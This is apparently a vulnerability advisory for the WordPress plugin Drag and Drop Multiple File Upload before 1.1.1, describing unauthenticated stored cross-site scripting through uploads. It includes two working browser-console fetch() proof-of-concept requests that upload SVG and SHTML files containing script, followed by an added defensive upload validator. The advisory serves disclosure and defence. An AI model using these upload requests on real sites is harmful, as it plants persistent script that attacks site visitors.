WordPress Plugin Vulnerabilities

Drag and Drop Multiple File Upload < 1.1.1 - Unauthenticated Stored Cross-Site Scripting

Description

The plugin's upload handler does not reject every potentially dangerous file extension, so an unauthenticated attacker can upload .shtml or .svg files containing scripts. Because the uploaded files are then served from the site's uploads directory, this results in stored cross-site scripting.

Proof of Concept

# Using malicious SVG files:

Go to a product page that features the file upload form, and paste the following in your browser console:

```
fetch("/wp-admin/admin-ajax.php", {
    "credentials": "omit",
    "headers": {
        "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/117.0",
        "Accept": "application/json, text/javascript, */*; q=0.01",
        "Accept-Language": "en-CA,en-US;q=0.7,en;q=0.3",
        "X-Requested-With": "XMLHttpRequest",
        "Content-Type": "multipart/form-data; boundary=---------------------------4807439943981355138852449656"
    },
    "referrer": "http://wpscan-vulnerability-test-bench.ddev.site/product/catapult/",
    "body": `-----------------------------4807439943981355138852449656\r\nContent-Disposition: form-data; name=\"supported_type\"\r\n\r\njpg|jpeg|png|gif|pdf|doc|docx|xls|xlsx|stl|mp4|mp3|zip|svg\r\n-----------------------------4807439943981355138852449656\r\nContent-Disposition: form-data; name=\"size_limit\"\r\n\r\n10485760\r\n-----------------------------4807439943981355138852449656\r\nContent-Disposition: form-data; name=\"action\"\r\n\r\ndnd_codedropz_upload_wc\r\n-----------------------------4807439943981355138852449656\r\nContent-Disposition: form-data; name=\"security\"\r\n\r\n${dnd_wc_uploader.nonce}\r\n-----------------------------4807439943981355138852449656\r\nContent-Disposition: form-data; name=\"dnd-wc-upload-file\"; filename=\"xss.svg\"\r\nContent-Type: image/jpeg\r\n\r\n<?xml version=\"1.0\" standalone=\"no\"?><!DOCTYPE svg PUBLIC \"-//W3C//DTD SVG 1.1//EN\" \"http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd\"><svg version=\"1.1\" baseProfile=\"full\" xmlns=\"http://www.w3.org/2000/svg\"><polygon id=\"triangle\" points=\"0,0 0,50 50,0\" fill=\"#009900\" stroke=\"#004400\"/><script type=\"text/javascript\">alert(\"XSS\");</script></svg>\n\r\n-----------------------------4807439943981355138852449656--\r\n`,
    "method": "POST",
    "mode": "cors"
}).then(x=>x.text()).then(x=>console.log(x));
```

You can then access the malicious file at http://vulnerable-site.tld/wp-content/uploads/wc_drag-n-drop_uploads/xss.svg


# Using malicious SHTML files:

Go to a product page that features the file upload form, and paste the following in your browser console:

```
fetch("/wp-admin/admin-ajax.php", {
    "credentials": "omit",
    "headers": {
        "X-Requested-With": "XMLHttpRequest",
        "Content-Type": "multipart/form-data; boundary=---------------------------4807439943981355138852449656"
    },
    "body": `-----------------------------4807439943981355138852449656\r\nContent-Disposition: form-data; name=\"supported_type\"\r\n\r\njpg|jpeg|png|gif|pdf|doc|docx|xls|xlsx|stl|mp4|mp3|zip|shtml\r\n-----------------------------4807439943981355138852449656\r\nContent-Disposition: form-data; name=\"size_limit\"\r\n\r\n10485760\r\n-----------------------------4807439943981355138852449656\r\nContent-Disposition: form-data; name=\"action\"\r\n\r\ndnd_codedropz_upload_wc\r\n-----------------------------4807439943981355138852449656\r\nContent-Disposition: form-data; name=\"security\"\r\n\r\n${dnd_wc_uploader.nonce}\r\n-----------------------------4807439943981355138852449656\r\nContent-Disposition: form-data; name=\"dnd-wc-upload-file\"; filename=\"xss.shtml\"\r\nContent-Type: image/jpeg\r\n\r\n<script>alert(1);</script>\n\r\n-----------------------------4807439943981355138852449656--\r\n`,
    "method": "POST",
    "mode": "cors"
}).then(x=>x.text()).then(x=>console.log(x));
```

You can then access the malicious file at http://vulnerable-site.tld/wp-content/uploads/wc_drag-n-drop_uploads/xss.shtml
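The following is an added defender-side example, not code from the advisory or from the plugin. It shows a server-side validator for the upload request shape both PoCs above use. Both PoC requests carry the list of accepted extensions in a `supported_type` form field, so the validator treats that field as untrusted and ignores it, applies a fixed server-owned allowlist (the extension set below is an assumption for the example, not the plugin's real list), rejects active-content extensions anywhere in the filename (which also catches double extensions such as `name.shtml.jpg`, a case the page does not discuss), requires the declared `Content-Type` to match the extension (both PoCs declare `image/jpeg` for non-image content), and rejects bodies that begin with markup, which a real image or PDF never does. The multipart parser, the boundary string, the sample requests and `NONCE_PLACEHOLDER` are all constructed here; only the field names `dnd-wc-upload-file`, `supported_type`, `size_limit`, `action` and `security` come from the page.

```javascript
// Added example: server-side validation of a multipart file upload.
// Not the plugin's code; allowlist contents and sample data are constructed.

const BOUNDARY = 'constructedBoundary0123456789'; // constructed for the demo

// Server-owned allowlist: extension -> the only Content-Type accepted for it.
// Assumed set for the example, not the plugin's real configuration.
const SERVER_ALLOWLIST = new Map([
  ['jpg', 'image/jpeg'], ['jpeg', 'image/jpeg'], ['png', 'image/png'],
  ['gif', 'image/gif'], ['pdf', 'application/pdf'],
]);

// Extensions a server or browser may execute or render as active content.
// Checked against every dot-separated segment so "x.shtml.jpg" is rejected too.
const ACTIVE_EXTENSIONS = new Set([
  'php', 'phtml', 'php5', 'shtml', 'shtm', 'svg', 'html', 'htm', 'xhtml', 'js', 'xml',
]);

// Build a multipart/form-data body in the shape a browser sends (demo helper).
function buildMultipart(boundary, fields, file) {
  let body = '';
  for (const [name, value] of Object.entries(fields)) {
    body += `--${boundary}\r\nContent-Disposition: form-data; name="${name}"\r\n\r\n${value}\r\n`;
  }
  body += `--${boundary}\r\nContent-Disposition: form-data; name="${file.field}"; ` +
    `filename="${file.filename}"\r\nContent-Type: ${file.contentType}\r\n\r\n` +
    `${file.data}\r\n--${boundary}--\r\n`;
  return body;
}

// Minimal multipart parser: returns [{ name, filename, contentType, data }].
function parseMultipart(body, boundary) {
  const parts = [];
  for (const chunk of body.split(`--${boundary}`)) {
    if (chunk === '' || chunk.startsWith('--')) continue; // preamble or closing delimiter
    const piece = chunk.startsWith('\r\n') ? chunk.slice(2) : chunk;
    const sep = piece.indexOf('\r\n\r\n');
    if (sep === -1) continue;
    const headers = {};
    for (const line of piece.slice(0, sep).split('\r\n')) {
      const colon = line.indexOf(':');
      if (colon > 0) headers[line.slice(0, colon).trim().toLowerCase()] = line.slice(colon + 1).trim();
    }
    let data = piece.slice(sep + 4);
    if (data.endsWith('\r\n')) data = data.slice(0, -2);
    const disposition = headers['content-disposition'] || '';
    // "(?:^|;\s*)" keeps name= from matching inside filename=.
    const name = /(?:^|;\s*)name="([^"]*)"/.exec(disposition);
    const filename = /filename="([^"]*)"/.exec(disposition);
    parts.push({
      name: name ? name[1] : null,
      filename: filename ? filename[1] : null,
      contentType: headers['content-type'] || null,
      data,
    });
  }
  return parts;
}

// Decide whether to accept the upload. The client's supported_type field is
// never consulted; it is only reported back so the caller can log it.
function validateUpload(body, boundary) {
  const parts = parseMultipart(body, boundary);
  const clientList = parts.find((p) => p.name === 'supported_type' && p.filename === null);
  const ignoredClientAllowlist = clientList ? clientList.data : null;
  const file = parts.find((p) => p.filename !== null);
  if (!file) return { accepted: false, filename: null, reasons: ['no file part'], ignoredClientAllowlist };

  const reasons = [];
  // Strip any path component, lower-case, split on dots: "xss.svg" -> ["xss", "svg"].
  const base = file.filename.split(/[\\/]/).pop().toLowerCase();
  const segments = base.split('.');
  const ext = segments.length > 1 ? segments[segments.length - 1] : '';
  for (const seg of segments.slice(1)) {
    if (ACTIVE_EXTENSIONS.has(seg)) reasons.push(`active-content extension "${seg}" in name`);
  }
  if (!SERVER_ALLOWLIST.has(ext)) {
    reasons.push(`extension "${ext}" not in server allowlist`);
  } else if (file.contentType !== SERVER_ALLOWLIST.get(ext)) {
    reasons.push(`Content-Type ${file.contentType} does not match .${ext}`);
  }
  // Binary image formats and PDF never start with '<'; SVG, HTML and SHTML do.
  if (/^\s*</.test(file.data)) reasons.push('file body begins with markup');
  return { accepted: reasons.length === 0, filename: base, reasons, ignoredClientAllowlist };
}

// Constructed sample requests in the shape of the PoC (values are made up).
const COMMON_FIELDS = {
  supported_type: 'jpg|jpeg|png|gif|pdf|svg|shtml', size_limit: '10485760',
  action: 'dnd_codedropz_upload_wc', security: 'NONCE_PLACEHOLDER',
};
const JPEG_STUB = '\xff\xd8\xff\xe0constructed-bytes'; // JPEG SOI marker, then filler
const FIELD = 'dnd-wc-upload-file';
const SAMPLES = {
  benignJpeg: buildMultipart(BOUNDARY, COMMON_FIELDS, { field: FIELD, filename: 'photo.jpg', contentType: 'image/jpeg', data: JPEG_STUB }),
  svgAsJpeg: buildMultipart(BOUNDARY, COMMON_FIELDS, { field: FIELD, filename: 'xss.svg', contentType: 'image/jpeg', data: '<?xml version="1.0"?><svg xmlns="http://www.w3.org/2000/svg"/>' }),
  shtml: buildMultipart(BOUNDARY, COMMON_FIELDS, { field: FIELD, filename: 'xss.shtml', contentType: 'image/jpeg', data: '<!--#echo var="DATE_LOCAL" -->' }),
  doubleExt: buildMultipart(BOUNDARY, COMMON_FIELDS, { field: FIELD, filename: 'photo.shtml.jpg', contentType: 'image/jpeg', data: JPEG_STUB }),
  typeMismatch: buildMultipart(BOUNDARY, COMMON_FIELDS, { field: FIELD, filename: 'photo.png', contentType: 'image/jpeg', data: JPEG_STUB }),
};

function runDemo() {
  const results = {};
  for (const [label, body] of Object.entries(SAMPLES)) results[label] = validateUpload(body, BOUNDARY);
  return results;
}

console.log(JSON.stringify(runDemo(), null, 2));
```

Only `benignJpeg` is accepted. The two PoC-shaped requests each fail three checks (active-content extension, not in the server allowlist, body begins with markup), `doubleExt` fails only the segment scan, and `typeMismatch` fails only the declared-type check; in every case the client's `supported_type` list had no influence on the decision.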

Classification

Type
XSS

Miscellaneous

Original Researcher
Zeyad Alshahrani
Submitter
Zeyad Alshahrani
Verified
Yes

Timeline

Publicly Published
2023-09-21
Added
2023-09-21
Last Updated
2023-09-21
